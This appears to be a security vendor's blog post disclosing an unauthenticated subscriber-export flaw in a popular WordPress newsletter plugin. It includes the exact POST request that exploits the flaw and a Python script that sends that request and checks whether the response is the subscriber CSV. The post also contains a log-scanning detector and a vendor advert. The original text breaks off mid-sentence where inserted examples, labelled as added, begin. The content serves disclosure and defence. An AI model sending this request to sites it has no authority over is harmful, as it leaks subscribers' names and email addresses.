The Email Subscribers & Newsletters WordPress plugin, developed by Icegram, has more than one hundred thousand active installs. It is a complete newsletter solution: you can collect leads, send automated notification emails, and create and send newsletters.
Email Subscribers & Newsletters is an excellent WordPress plugin with a lot of features. However, today I don't want to discuss all the features of this plugin; I want to talk about the vulnerability that ThreatPress Security found in this piece of software.
Email Subscribers & Newsletters plugin vulnerability
Recently we (ThreatPress Security) found a vulnerability in the Email Subscribers & Newsletters plugin that can be easily exploited by anyone, logged in or not. The result of a successful attack is the complete list of subscribers.
The CSV file you can download if the attack succeeds contains names and email addresses. It is not the first time we have seen a vulnerability that causes data leakage, but in this case it is a dangerous problem because of the plugin's popularity.
Let's do some math. WordPress statistics say there are more than one hundred thousand active installs. We can confirm that we were able to find 81,212 websites that have this plugin installed and active.
Later we did some research to find out the average number of subscribers per site (please don't ask us how we did it). Several sites had more than forty thousand subscribers, and most websites had about two hundred.
Now let's take two hundred subscribers as the average and multiply it by the number of sites we were able to detect: 81,212 sites times 200 subscribers is roughly 16 million subscribers, quite a sweet bite for any hacker.
Since the vulnerability is easily exploitable and there are lots of public data sources (Google dorking and more) that an attacker can use to find vulnerable websites, it could become a massive data leak.
Exploitation of the vulnerability
OK, here is the worst part. A simple HTTP POST request sent to the vulnerable website at "domain.com/?es=export" with an extra parameter such as
option=view_all_subscribers lets you download a CSV file containing the whole subscriber database, with no authentication required. The file responsible for the export is "export-email-address.php". An attacker can use some more additional parameters like
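If you want to check your own site (or a client's site you are authorised to test) for this export without guessing at the plugin code, the following added example does it. It is not ThreatPress or Icegram code and it is not from the original post; it uses only what the post states, namely that a POST to "domain.com/?es=export" with option=view_all_subscribers returns the subscriber CSV. The response classifier's heuristics (CSV content type, .csv attachment, or a non-HTML body with email addresses on several lines) and the sample responses are assumptions made for the example.

```python
"""
Vulnerability check for the unauthenticated export request described above.
Added example, not ThreatPress or Icegram code. Uses only what the post
states (POST to <site>/?es=export with option=view_all_subscribers returns
the subscriber CSV); the response heuristics and the sample responses
below are assumptions made here.
"""
import re
import urllib.parse
import urllib.request

EMAIL_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")


def build_probe(site):
    """Return (url, form_body) for the request the post describes."""
    url = site.rstrip("/") + "/?" + urllib.parse.urlencode({"es": "export"})
    body = urllib.parse.urlencode({"option": "view_all_subscribers"}).encode()
    return url, body


def looks_like_subscriber_export(headers, body):
    """Heuristic (assumption): a CSV content type, a .csv attachment, or a
    non-HTML body with email addresses on at least two lines means the site
    handed out the export instead of a normal page or a login redirect."""
    h = {k.lower(): v.lower() for k, v in headers.items()}
    ctype = h.get("content-type", "")
    cdisp = h.get("content-disposition", "")
    if "text/csv" in ctype or ("attachment" in cdisp and ".csv" in cdisp):
        return True
    text = body.decode("utf-8", "replace")
    if "<html" in text.lower():
        return False
    return sum(1 for line in text.splitlines() if EMAIL_RE.search(line)) >= 2


def probe(site, timeout=10):
    """Send the probe to a site you are authorised to test.
    Returns True when the response looks like the subscriber export."""
    url, body = build_probe(site)
    req = urllib.request.Request(
        url, data=body, method="POST",
        headers={"User-Agent": "es-export-check",
                 "Content-Type": "application/x-www-form-urlencoded"})
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return looks_like_subscriber_export(dict(resp.headers.items()), resp.read())


# Constructed sample responses (not captured from any real site).
SAMPLES = {
    "patched_login_page": (
        {"Content-Type": "text/html; charset=UTF-8"},
        b"<html><body><form id='loginform'>...</form></body></html>",
    ),
    "csv_attachment": (
        {"Content-Type": "application/octet-stream",
         "Content-Disposition": "attachment; filename=subscribers.csv"},
        b"x",  # body irrelevant once the headers announce a CSV download
    ),
    "untyped_csv_body": (
        {"Content-Type": "text/plain"},
        b"Name,Email\nAlice,alice@example.org\nBob,bob@example.net\n",
    ),
    "contact_page_text": (
        {"Content-Type": "text/plain"},
        b"Write to info@example.org for support.\n",
    ),
}


def classify_samples():
    """Run the classifier over the constructed samples; returns name -> verdict."""
    return {name: looks_like_subscriber_export(hd, bd)
            for name, (hd, bd) in SAMPLES.items()}


if __name__ == "__main__":
    print(build_probe("https://example.com/"))
    print(classify_samples())
```

The classifier deliberately does not rely on the CSV column names, which the post does not give; a patched site typically answers with an HTML page or a redirect to the login form, which is why the HTML check short-circuits to "not vulnerable". Only run probe() against sites you are permitted to test.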
As you can see, exploitation is trivial, and an attacker with minimal skills can access the data without much effort. Moreover, a more skilled attacker can automate the process: identify all websites with the vulnerable plugin on the Internet and launch a bot that downloads the data from every vulnerable site.
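To spot that kind of automated harvesting in your own logs after the fact, here is an added example (not part of the original post, and not ThreatPress code) that scans combined-format access log lines, the Apache and nginx default, for POST requests whose query string carries es=export. The log lines are constructed for the example. One caveat a practitioner should know: the option=view_all_subscribers field travels in the POST body, which access logs never record, so the query string and the response size are the only traces you get.

```python
"""
Detect the export request pattern from this post in web-server access logs.
Added example; not part of the original page. Assumes combined log format
(Apache/nginx default); the log lines below are constructed.
"""
import re
import urllib.parse
from collections import Counter

# Combined log format: ip ident user [time] "METHOD path proto" status size "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\d+|-)'
)


def is_export_request(method, path):
    """True for the request the post describes: POST to /?es=export.
    Only the query string is logged; the option=... form field is in the
    body, which access logs do not record."""
    query = path.split("?", 1)[1] if "?" in path else ""
    params = urllib.parse.parse_qs(query)
    return method == "POST" and params.get("es") == ["export"]


def find_export_hits(lines):
    """Return (ip, timestamp, status, response_size) for each matching line.
    A 200 with a large body is the one that most likely carried the CSV."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if m and is_export_request(m["method"], m["path"]):
            size = 0 if m["size"] == "-" else int(m["size"])
            hits.append((m["ip"], m["ts"], int(m["status"]), size))
    return hits


def sources(hits):
    """Count hits per source IP so a bot sweeping the site stands out."""
    return Counter(ip for ip, _, _, _ in hits)


# Constructed log excerpt: two export POSTs (one large 200 response that
# probably carried the CSV), one GET to the same URL, and unrelated traffic.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Mar/2018:10:01:02 +0000] "GET /?p=12 HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Mar/2018:10:01:05 +0000] "POST /?es=export HTTP/1.1" 200 48120 "-" "python-requests/2.18.4"
198.51.100.4 - - [10/Mar/2018:10:02:11 +0000] "POST /?es=export HTTP/1.1" 200 302 "-" "curl/7.58.0"
203.0.113.7 - - [10/Mar/2018:10:03:00 +0000] "GET /?es=export HTTP/1.1" 302 - "-" "Mozilla/5.0"
192.0.2.9 - - [10/Mar/2018:10:04:00 +0000] "POST /wp-login.php HTTP/1.1" 200 2100 "-" "Mozilla/5.0"
"""


def scan_sample():
    """Run the detector over the constructed excerpt."""
    return find_export_hits(SAMPLE_LOG.splitlines())


if __name__ == "__main__":
    for hit in scan_sample():
        print(hit)
    print(sources(scan_sample()))
```

Feed find_export_hits() your real log files and sort the hits by response size: on a vulnerable site the CSV download is the unusually large 200 response, while a patched site answers the same request with a small page or a 302 to the login form.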
Such a vulnerability can have a significant impact on the security of a hundred thousand WordPress websites and on millions of their users. Again, I want to remind you that site security requires constant attention and several layers of protection.
Receiving timely information can save your site from significant problems, which is why I recommend using the ThreatPress Security plugin for WordPress. You get an alert instantly if the plugin detects any vulnerable software on your WordPress site. Since the ThreatPress Security plugin uses an API to check the status of your plugins, themes, and WordPress itself against the ThreatPress vulnerability database, it provides the quickest possible reaction to newly discovered threats. And don't forget to keep your software up to date.